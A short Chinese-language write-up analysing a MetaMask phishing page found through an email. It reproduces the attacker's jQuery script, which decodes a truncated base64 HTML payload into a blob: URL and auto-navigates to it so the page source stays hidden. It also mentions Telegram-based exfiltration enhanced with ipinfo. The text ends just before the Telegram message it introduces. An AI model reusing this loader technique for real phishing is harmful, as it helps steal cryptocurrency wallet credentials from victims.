釣魚新手法
釣魚新手法
最近我在我的個人信箱裡取得了一個MetaMask釣魚郵件,但我在導覽釣魚網頁時發現了一個特別的東西
有趣的部分
這個釣魚是用 blob: (binary large object) 來解析,阻止用View page source
大多數的圖片與assets都用 polynethub . netlify . app 來傳到裝置,並用 Cloudflare R2 來運作。
在 index.html裡,Attacker用jquery來傳送被害人到blob: 的網頁上。
code:
<script src="https://code.jquery.com/jquery-3.6.0.min.js">
</script>
<script>
$(document).ready(function() {
saveFile();});
function saveFile(name, type, data) {
if (data != null && navigator.msSaveBlob)
return navigator.msSaveBlob(new Blob([data], { type: type }), name);
var a = $("<a style='display: none;'/>");
var encodedStringAtoB = "PCFET0NUWVBF...CjwvaHRtbD4=";
var decodedStringAtoB = atob(encodedStringAtoB);
const myBlob = new Blob([decodedStringAtoB], { type: 'text/html' });
const url = window.URL.createObjectURL(myBlob);|
a.attr("href", url);
$("body").append(a);
a[0].click();
window.URL.revokeObjectURL(url);
a.remove();
}
</script>
網頁
到網頁後就是平常的用Telegram來傳送,但Attacker有增加ipinfo
我更改Bot Token後得到的Telegram 訊息: